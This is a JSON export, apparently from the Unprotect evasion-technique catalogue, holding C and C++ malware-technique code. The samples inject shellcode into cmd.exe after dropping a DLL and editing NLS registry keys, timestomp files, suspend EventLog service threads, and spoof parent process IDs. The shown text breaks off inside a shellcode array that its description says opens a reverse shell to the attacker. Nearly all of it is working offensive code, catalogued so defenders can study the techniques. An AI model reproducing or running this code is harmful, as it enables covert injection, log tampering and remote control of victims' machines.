CreateProcessToInject(LPPROCESS_INFORMATION procInfo) {\r\n\tSTARTUPINFOW infoProc;\r\n\t//PROCESS_INFORMATION processInfo;\r\n\tZeroMemory(&infoProc, sizeof(infoProc));\r\n\tinfoProc.cb = sizeof(infoProc);\r\n\tZeroMemory(procInfo, sizeof(procInfo));\r\n\twchar_t path[MAX_PATH];\r\n\tGetSystemDirectoryW(path, MAX_PATH);\r\n\twcscat_s(path, MAX_PATH, L\"\\\\cmd.exe\");\r\n\treturn CreateProcessW(NULL, path, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &infoProc, procInfo) != NULL;\r\n}\r\n\r\nbool DropSystemDllPayload(PRegistryKey regObject) {\r\n\tHMODULE hMod = GetModuleHandleA(NULL);\r\n\tHRSRC hResource = FindResource(hMod, MAKEINTRESOURCE(IDR_RT_RCDATA1), L\"RT_RCDATA\");\r\n\tif (hResource == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the payload dll resource, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwSizeResource = SizeofResource(hMod, hResource);\r\n\tHGLOBAL hResLoaded = LoadResource(hMod, hResource);\r\n\tif (hResLoaded == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the dll, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tauto pBuffer = static_cast<BYTE*> (LockResource(hResLoaded));\r\n\tLPWSTR pathPayload = new wchar_t[MAX_PATH];\r\n\tGetSystemDirectoryW(pathPayload, MAX_PATH);\r\n\twcscat_s(pathPayload, MAX_PATH, L\"\\\\\");\r\n\twcscat_s(pathPayload, MAX_PATH, regObject->getStringBuffer(Index::DLL_NAME));\r\n\tregObject->setStringBuffer(pathPayload, Index::FULL_PAYLOAD_DLL_PATH);\r\n\tHANDLE hFile = CreateFileW(pathPayload, GENERIC_ALL, FILE_SHARE_DELETE,\r\n\t\tNULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, nullptr);\r\n\tdelete[] pathPayload;\r\n\tif (hFile == INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tif (GetLastError() == ERROR_FILE_EXISTS){\r\n\t\t\tstd::printf(\"File already exists, trying to set up registry.\\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tstd::printf(\"Could not obtain HANDLE to the newly created FILE, last error is %d\\n\", GetLastError());\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwNumberBytesWritten;\r\n\tif (!WriteFile(hFile, pBuffer, dwSizeResource, &dwNumberBytesWritten, nullptr))\r\n\t{\r\n\t\tstd::printf(\"Could not write to file, last error is %d\\n\", GetLastError());\r\n\t\tCloseHandle(hFile);\r\n\t\treturn false;\r\n\t}\r\n\tCloseHandle(hFile);\r\n\treturn true;\r\n}\r\n\r\nvoid SelfSpawnPayload(DWORD dwCodePageId)\r\n{\r\n\tif (!GetConsoleWindow())\r\n\t{\r\n\t\tif (!AllocConsole()) {\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\tif (!SetConsoleOutputCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test injection in SetConsoleOutputCP, last error is: 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tif (!SetConsoleCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test for SetConsoleCp: Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tSetThreadUILanguage(0);\r\n}\r\n\r\nvoid InjectStagerToPayload(PRegistryKey regObject) {\r\n\tLPVOID lpCodePageID = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, sizeof(DWORD), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (lpCodePageID == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\tDWORD codePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, lpCodePageID, &codePageID, sizeof(DWORD), NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Alloc and write shellcode, easiest way is VirtualAllocEx + WPM, but we have to pass arg, so I am not so sure how I am going to do that...\r\n\tLPVOID ShellcodeMemory = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, lengthInject, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (ShellcodeMemory == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//This will write the payload in the remote process.\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, ShellcodeMemory, &StubInject, lengthInject, NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Need to change protection to EXECUTE_READ.\r\n\tDWORD dwProtection;\r\n\tif (!VirtualProtectEx(regObject->m_procInfo.hProcess, ShellcodeMemory, lengthInject, PAGE_EXECUTE_READ, &dwProtection)) {\r\n\t\tstd::printf(\"Could not change protection of memory for shellcode injection. Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tHANDLE hThread = CreateRemoteThread(regObject->m_procInfo.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)ShellcodeMemory, lpCodePageID, 0, nullptr);\r\n\tif (hThread == INVALID_HANDLE_VALUE) {\r\n\t\tstd::printf(\"Could not open a handle to the payload .exe\\n\");\r\n\t\treturn;\r\n\t}\r\n\tstd::printf(\"Sucessfully injected to remote process, where shellcodeMemory is %p, and the codePageID is %d\\n\", ShellcodeMemory, codePageID);\r\n}\r\n\r\n//Error of payload is at writing the payload.dll!\r\nbool OpenKeyForNlsModification(PRegistryKey regObject) noexcept\r\n{\r\n\tbool bResult = false; \r\n\tif (RegOpenKeyExW(HKEY_LOCAL_MACHINE, regObject->getStringBuffer(Index::SUBKEY_KEY_VALUE),\r\n\t\t0, KEY_ALL_ACCESS, ®Object->hSubkeyNls) != EXIT_SUCCESS)\r\n\t{\r\n\t\tstd::printf(\"Could not open handle to subkey of codePage!, LastError [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\tif (!DropSystemDllPayload(regObject)) {\r\n\t\tstd::printf(\"Payload dll has been failed to drop main payload \\n\");\r\n\t\treturn bResult;\r\n\t}\r\n\tif (!IterateCodePageAndExtractProperId(regObject)){\r\n\t\tstd::printf(\"Could not iterate key for proper modification. Last error: [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\t//DWORD dwCodePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\t//std::printf(\"The code page ID is %d\\n\", dwCodePageID);\r\n\t//SelfSpawnPayload(dwCodePageID);\r\n\tif (CreateProcessToInject(®Object->m_procInfo))\r\n\t{\r\n\t\tInjectStagerToPayload(regObject);\r\n\t}\r\n\r\n\treturn bResult;\r\n}"
},
{
"id": 83,
"language": {
"id": 10,
"label": "C",
"code_class": "C"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/165/?format=api",
"description": "Original source and author: https://github.com/limbenjamin/nTimetools",
"plain_code": "// #######################################################################\r\n// ############ HEADER FILES\r\n// #######################################################################\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <inttypes.h>\r\n#include <math.h>\r\n\r\ntypedef LONG NTSTATUS;\r\nchar* VERSION_NO = \"1.1\";\r\nHANDLE file = NULL;\r\n\r\n\r\ntypedef struct _IO_STATUS_BLOCK {\r\n\tunion {\r\n\t\tNTSTATUS Status;\r\n\t\tPVOID Pointer;\r\n\t};\r\n\tULONG_PTR Information;\r\n} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;\r\n\r\ntypedef enum _FILE_INFORMATION_CLASS {\r\n\tFileBasicInformation = 4,\r\n\tFileStandardInformation = 5,\r\n\tFilePositionInformation = 14,\r\n\tFileEndOfFileInformation = 20,\r\n} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;\r\n\r\ntypedef struct _FILE_BASIC_INFORMATION {\r\n\tLARGE_INTEGER CreationTime;\t\t\t\t\t\t\t// Created \r\n\tLARGE_INTEGER LastAccessTime; // Accessed \r\n\tLARGE_INTEGER LastWriteTime; // Modifed\r\n\tLARGE_INTEGER ChangeTime; // Entry Modified\r\n\tULONG FileAttributes;\r\n} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;\r\n\r\ntypedef NTSTATUS(WINAPI *pNtSetInformationFile)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS);\r\ntypedef NTSTATUS(WINAPI *pNtQueryInformationFile)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS);\r\n\r\nHANDLE LoadFile(char *filename, FILE_BASIC_INFORMATION *fbi);\r\nVOID RetrieveFileBasicInformation(char *filename, FILE_BASIC_INFORMATION *fbi);\r\nDWORD SetFileMACE(HANDLE file, DWORD fileAttributes, char *mtimestamp, char *atimestamp, char *ctimestamp, char *btimestamp);\r\nLARGE_INTEGER ParseDateTimeInput(char *inputstring);\r\nVOID About();\r\nVOID Usage();\r\n\r\n// #######################################################################\r\n// ############ FUNCTIONS\r\n// #######################################################################\r\n\r\nVOID About() {\r\n\tprintf(\"nTimestomp, Version %s\\r\\n\", VERSION_NO);\r\n\tprintf(\"Copyright (C) 2019 Benjamin Lim\\r\\n\");\r\n\tprintf(\"Available for free from https://limbenjamin.com/pages/ntimetools\\r\\n\");\r\n\tprintf(\"\\r\\n\");\r\n}\r\n\r\nVOID Usage() {\r\n\tprintf(\"\\r\\n\");\r\n\tprintf(\"Usage: .\\\\nTimestomp.exe [Modified Date] [Last Access Date] [Last Write Date] [Creation Date]\\r\\n\");\r\n\tprintf(\"Date Format: yyyy-mm-dd hh:mm:ss.ddddddd\\r\\n\");\r\n\tprintf(\"\\r\\n\");\r\n}\r\n\r\nHANDLE LoadFile(char *filename, FILE_BASIC_INFORMATION *fbi) {\r\n\r\n\tHANDLE file = NULL;\r\n\tHMODULE ntdll = NULL;\r\n\r\n\tfile = CreateFile(filename, GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL);\r\n\tif (file == INVALID_HANDLE_VALUE) {\r\n\t\tprintf(\"Cannot open file: %S\\r\\n\", filename);\r\n\t\tUsage();\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* load ntdll and retrieve function pointer */\r\n\tntdll = GetModuleHandle(TEXT(\"ntdll.dll\"));\r\n\tif (ntdll == NULL) {\r\n\t\tprintf(\"Cannot load ntdll\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tFreeLibrary(ntdll);\r\n\r\n\treturn file;\r\n}\r\n\r\n/* returns the handle on success or NULL on failure. this function opens a file and returns\r\nthe FILE_BASIC_INFORMATION on it. */\r\nVOID RetrieveFileBasicInformation(HANDLE file, FILE_BASIC_INFORMATION *fbi) {\r\n\r\n\tHMODULE ntdll = NULL;\r\n\tpNtQueryInformationFile NtQueryInformationFile = NULL;\r\n\tIO_STATUS_BLOCK iostatus;\r\n\r\n\t/* load ntdll and retrieve function pointer */\r\n\tntdll = GetModuleHandle(TEXT(\"ntdll.dll\"));\r\n\tif (ntdll == NULL) {\r\n\t\tprintf(\"Cannot load ntdll\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* retrieve current timestamps including file attributes which we want to preserve */\r\n\tNtQueryInformationFile = (pNtQueryInformationFile)GetProcAddress(ntdll, \"NtQueryInformationFile\");\r\n\tif (NtQueryInformationFile == NULL) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* obtain the current file information including attributes */\r\n\tif (NtQueryInformationFile(file, &iostatus, fbi, sizeof(FILE_BASIC_INFORMATION), 4) < 0) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* clean up */\r\n\tFreeLibrary(ntdll);\r\n\r\n}\r\n\r\nDWORD SetFileMACE(HANDLE file, DWORD fileAttributes, char *mtimestamp, char *atimestamp, char *ctimestamp, char *btimestamp) {\r\n\r\n\tHMODULE ntdll = NULL;\r\n\tpNtSetInformationFile NtSetInformationFile = NULL;\r\n\tIO_STATUS_BLOCK iostatus;\r\n\r\n\tFILE_BASIC_INFORMATION fbi;\r\n\tfbi.LastWriteTime = ParseDateTimeInput(mtimestamp);\r\n\tfbi.LastAccessTime = ParseDateTimeInput(atimestamp);\r\n\tfbi.ChangeTime = ParseDateTimeInput(ctimestamp);\r\n\tfbi.CreationTime = ParseDateTimeInput(btimestamp);\r\n\t\r\n\tfbi.FileAttributes = fileAttributes;\r\n\r\n\t/* load ntdll and retrieve function pointer */\r\n\tntdll = GetModuleHandle(TEXT(\"ntdll.dll\"));\r\n\tif (ntdll == NULL) {\r\n\t\tprintf(\"Cannot load ntdll\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tNtSetInformationFile = (pNtSetInformationFile)GetProcAddress(ntdll, \"NtSetInformationFile\");\r\n\tif (NtSetInformationFile == NULL) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (NtSetInformationFile(file, &iostatus, &fbi, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* clean up */\r\n\tprintf(\"File timestamp successfully set\\r\\n\");\r\n\tFreeLibrary(ntdll);\r\n\r\n\treturn 0;\r\n}\r\n\r\nLARGE_INTEGER ParseDateTimeInput(char *inputstring) {\r\n\r\n\tSYSTEMTIME systemtime = { 0 };\r\n\tLARGE_INTEGER nanoTime = { 0 };\r\n\tFILETIME filetime;\r\n\tLARGE_INTEGER dec = { 0 };\r\n\tLARGE_INTEGER res = { 0 };\r\n\r\n\tif (sscanf_s(inputstring, \"%hu-%hu-%hu %hu:%hu:%hu.%7d\", &systemtime.wYear, &systemtime.wMonth, &systemtime.wDay, &systemtime.wHour, &systemtime.wMinute, &systemtime.wSecond, &dec.QuadPart) == 0) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* sanitize input */\r\n\r\n\tif (systemtime.wMonth < 1 || systemtime.wMonth > 12) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tif (systemtime.wDay < 1 || systemtime.wDay > 31) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tif (systemtime.wYear < 1601 || systemtime.wYear > 30827) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (systemtime.wMinute < 0 || systemtime.wMinute > 59) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tif (systemtime.wSecond < 0 || systemtime.wSecond > 59) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tsystemtime.wMilliseconds = 0;\r\n\tif (SystemTimeToFileTime(&systemtime, &filetime) == 0) {\r\n\t\tprintf(\"Invalid filetime\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tnanoTime.LowPart = filetime.dwLowDateTime;\r\n\tnanoTime.HighPart = filetime.dwHighDateTime;\r\n\r\n\tres.QuadPart = nanoTime.QuadPart + dec.QuadPart;\r\n\r\n\treturn res;\r\n}\r\n\r\n/* returns 0 on error, 1 on success. this function converts a LARGE_INTEGER to a SYSTEMTIME structure */\r\nDWORD ConvertLargeIntegerToLocalTime(SYSTEMTIME *localsystemtime, LARGE_INTEGER largeinteger) {\r\n\r\n\tFILETIME filetime;\r\n\tFILETIME localfiletime;\r\n\tDWORD result = 0;\r\n\r\n\tfiletime.dwLowDateTime = largeinteger.LowPart;\r\n\tfiletime.dwHighDateTime = largeinteger.HighPart;\r\n\r\n\tif (FileTimeToSystemTime(&filetime, localsystemtime) == 0) {\r\n\t\tprintf(\"Invalid filetime\\r\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn 1;\r\n}\r\n\r\nint main(int argc, char* argv[]) {\r\n\r\n\tif (argc < 5) {\r\n\t\tUsage();\r\n\t\texit(1);\r\n\t}\r\n\r\n\tFILE_BASIC_INFORMATION fbi; \r\n\tstruct _SYSTEMTIME time = { 0 };\r\n\twchar_t filename[4096] = { 0 };\r\n\tchar str[256];\r\n\tCHAR lpVolumeNameBuffer[MAX_PATH + 1] = { 0 };\r\n\tCHAR lpFileSystemNameBuffer[MAX_PATH + 1] = { 0 };\r\n\tLARGE_INTEGER lpFileSizeHigh = { 0 };\r\n\r\n\tAbout();\r\n\tMultiByteToWideChar(CP_ACP, 0, argv[1], -1, filename, 4096);\r\n\tfile = LoadFile(filename, &fbi);\r\n\tGetVolumeInformationByHandleW(file, &lpVolumeNameBuffer, ARRAYSIZE(lpVolumeNameBuffer), 0, 0, 0, &lpFileSystemNameBuffer, ARRAYSIZE(lpVolumeNameBuffer));\r\n\tGetFileSizeEx(file, &lpFileSizeHigh);\r\n\r\n\tprintf(\"Filesystem type:\t\t%S\\r\\n\", lpFileSystemNameBuffer);\r\n\tprintf(\"Filename:\t\t\t%S\\r\\n\", filename);\r\n\tprintf(\"File size:\t\t\t%d\\r\\n\", lpFileSizeHigh.QuadPart);\r\n\tprintf(\"\\r\\n\");\r\n\r\n\tSetFileMACE(file, fbi.FileAttributes, argv[2], argv[3], argv[4], argv[5]);\r\n\tRetrieveFileBasicInformation(file, &fbi);\r\n\r\n\tprintf(\"\\r\\n\");\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.LastWriteTime);\r\n\tif (fbi.LastWriteTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.LastWriteTime.QuadPart);\r\n\t\tprintf(\"[M] Last Write Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[M] Last Write Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tmemset(&time, 0, sizeof(time));\r\n\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.LastAccessTime);\r\n\tif (fbi.LastAccessTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.LastAccessTime.QuadPart);\r\n\t\tprintf(\"[A] Last Access Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[A] Last Access Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tmemset(&time, 0, sizeof(time));\r\n\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.ChangeTime);\r\n\tif (fbi.ChangeTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.ChangeTime.QuadPart);\r\n\t\tprintf(\"[C] Metadata Change Time:\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[C] Metadata Change Time:\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tmemset(&time, 0, sizeof(time));\r\n\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.CreationTime);\r\n\tif (fbi.CreationTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.CreationTime.QuadPart);\r\n\t\tprintf(\"[B] Creation Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[B] Creation Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tprintf(\"\\r\\n\");\r\n\tCloseHandle(file);\r\n}"
},
{
"id": 84,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/172/?format=api",
"description": "Original source code: https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog-service-threads",
"plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <Psapi.h>\r\n#include <TlHelp32.h>\r\n#include <dbghelp.h>\r\n#include <winternl.h>\r\n\r\n#pragma comment(lib, \"DbgHelp\")\r\n\r\nusing myNtQueryInformationThread = NTSTATUS(NTAPI*)(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tOUT PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength,\r\n\tOUT PULONG ReturnLength\r\n\t);\r\n\r\nint main()\r\n{\r\n\tHANDLE serviceProcessHandle;\r\n\tHANDLE snapshotHandle;\r\n\tHANDLE threadHandle;\r\n\r\n\tHMODULE modules[256] = {};\r\n\tSIZE_T modulesSize = sizeof(modules);\r\n\tDWORD modulesSizeNeeded = 0;\r\n\tDWORD moduleNameSize = 0;\r\n\tSIZE_T modulesCount = 0;\r\n\tWCHAR remoteModuleName[128] = {};\r\n\tHMODULE serviceModule = NULL;\r\n\tMODULEINFO serviceModuleInfo = {};\r\n\tDWORD_PTR threadStartAddress = 0;\r\n\tDWORD bytesNeeded = 0;\r\n\r\n\tmyNtQueryInformationThread NtQueryInformationThread = (myNtQueryInformationThread)(GetProcAddress(GetModuleHandleA(\"ntdll\"), \"NtQueryInformationThread\"));\r\n\r\n\tTHREADENTRY32 threadEntry;\r\n\tthreadEntry.dwSize = sizeof(THREADENTRY32);\r\n\r\n\tSC_HANDLE sc = OpenSCManagerA(\".\", NULL, MAXIMUM_ALLOWED);\r\n\tSC_HANDLE service = OpenServiceA(sc, \"EventLog\", MAXIMUM_ALLOWED);\r\n\r\n\tSERVICE_STATUS_PROCESS serviceStatusProcess = {};\r\n\r\n\t# Get PID of svchost.exe that hosts EventLog service\r\n\tQueryServiceStatusEx(service, SC_STATUS_PROCESS_INFO, (LPBYTE)&serviceStatusProcess, sizeof(serviceStatusProcess), &bytesNeeded);\r\n\tDWORD servicePID = serviceStatusProcess.dwProcessId;\r\n\r\n\t# Open handle to the svchost.exe\r\n\tserviceProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, servicePID);\r\n\tsnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n\r\n\t# Get a list of modules loaded by svchost.exe\r\n\tEnumProcessModules(serviceProcessHandle, modules, modulesSize, &modulesSizeNeeded);\r\n\tmodulesCount = modulesSizeNeeded / sizeof(HMODULE);\r\n\tfor (size_t i = 0; i < modulesCount; i++)\r\n\t{\r\n\t\tserviceModule = modules[i];\r\n\r\n\t\t# Get loaded module's name\r\n\t\tGetModuleBaseName(serviceProcessHandle, serviceModule, remoteModuleName, sizeof(remoteModuleName));\r\n\r\n\t\tif (wcscmp(remoteModuleName, L\"wevtsvc.dll\") == 0)\r\n\t\t{\r\n\t\t\tprintf(\"Windows EventLog module %S at %p\\n\\n\", remoteModuleName, serviceModule);\r\n\t\t\tGetModuleInformation(serviceProcessHandle, serviceModule, &serviceModuleInfo, sizeof(MODULEINFO));\r\n\t\t}\r\n\t}\r\n\r\n\t# Enumerate threads\r\n\tThread32First(snapshotHandle, &threadEntry);\r\n\twhile (Thread32Next(snapshotHandle, &threadEntry))\r\n\t{\r\n\t\tif (threadEntry.th32OwnerProcessID == servicePID)\r\n\t\t{\r\n\t\t\tthreadHandle = OpenThread(MAXIMUM_ALLOWED, FALSE, threadEntry.th32ThreadID);\r\n\t\t\tNtQueryInformationThread(threadHandle, (THREADINFOCLASS)0x9, &threadStartAddress, sizeof(DWORD_PTR), NULL);\r\n\t\t\t\r\n\t\t\t# Check if thread's start address is inside wevtsvc.dll memory range\r\n\t\t\tif (threadStartAddress >= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll && threadStartAddress <= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll + serviceModuleInfo.SizeOfImage)\r\n\t\t\t{\r\n\t\t\t\tprintf(\"Suspending EventLog thread %d with start address %p\\n\", threadEntry.th32ThreadID, threadStartAddress);\r\n\r\n\t\t\t\t# Suspend EventLog service thread\r\n\t\t\t\tSuspendThread(threadHandle);\r\n\t\t\t\tSleep(2000);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn 0;\r\n}"
},
{
"id": 85,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/173/?format=api",
"description": "Original Source code: https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
"plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nint main() \r\n{\r\n\tSTARTUPINFOEXA si;\r\n\tPROCESS_INFORMATION pi;\r\n\tSIZE_T attributeSize;\r\n\tZeroMemory(&si, sizeof(STARTUPINFOEXA));\r\n\t\r\n\tHANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 6200);\r\n\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);\r\n\tsi.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);\r\n\tInitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);\r\n\tUpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsi.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(NULL, (LPSTR)\"notepad\", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);\r\n\r\n\treturn 0;\r\n}"
},
{
"id": 86,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/118/?format=api",
"description": "The below code will inject the shellcode into a notepad.exe process with PID 5428 which will initiate a reverse shell back to the attacker. \r\nOriginal source code: https://www.ired.team/offensive-security/code-injection-process-injection/process-injection",
"plain_code": "#include \"stdafx.h\"\r\n#include \"Windows.h\"\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tunsigned char shellcode[] =\r\n\t\t\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xc6\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff\"\r\n\t\t\"\\xff\\xff\\x48\\xbb\\x1d\\xbe\\xa2\\x7b\\x2b\\x90\\xe1\\xec\\x48\\x31\\x58\"\r\n\t\t\"\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xe1\\xf6\\x21\\x9f\\xdb\\x78\"\r\n\t\t\"\\x21\\xec\\x1d\\xbe\\xe3\\x2a\\x6a\\xc0\\xb3\\xbd\\x4b\\xf6\\x93\\xa9\\x4e\"\r\n\t\t\"\\xd8\\x6a\\xbe\\x7d\\xf6\\x29\\x29\\x33\\xd8\\x6a\\xbe\\x3d\\xf6\\x29\\x09\"\r\n\t\t\"\\x7b\\xd8\\xee\\x5b\\x57\\xf4\\xef\\x4a\\xe2\\xd8\\xd0\\x2c\\xb1\\x82\\xc3\"\r\n\t\t\"\\x07\\x29\\xbc\\xc1\\xad\\xdc\\x77\\xaf\\x3a\\x2a\\x51\\x03\\x01\\x4f\\xff\"\r\n\t\t\"\\xf3\\x33\\xa0\\xc2\\xc1\\x67\\x5f\\x82\\xea\\x7a\\xfb\\x1b\\x61\\x64\\x1d\"\r\n\t\t\"\\xbe\\xa2\\x33\\xae\\x50\\x95\\x8b\\x55\\xbf\\x72\\x2b\\xa0\\xd8\\xf9\\xa8\"\r\n\t\t\"\\x96\\xfe\\x82\\x32\\x2a\\x40\\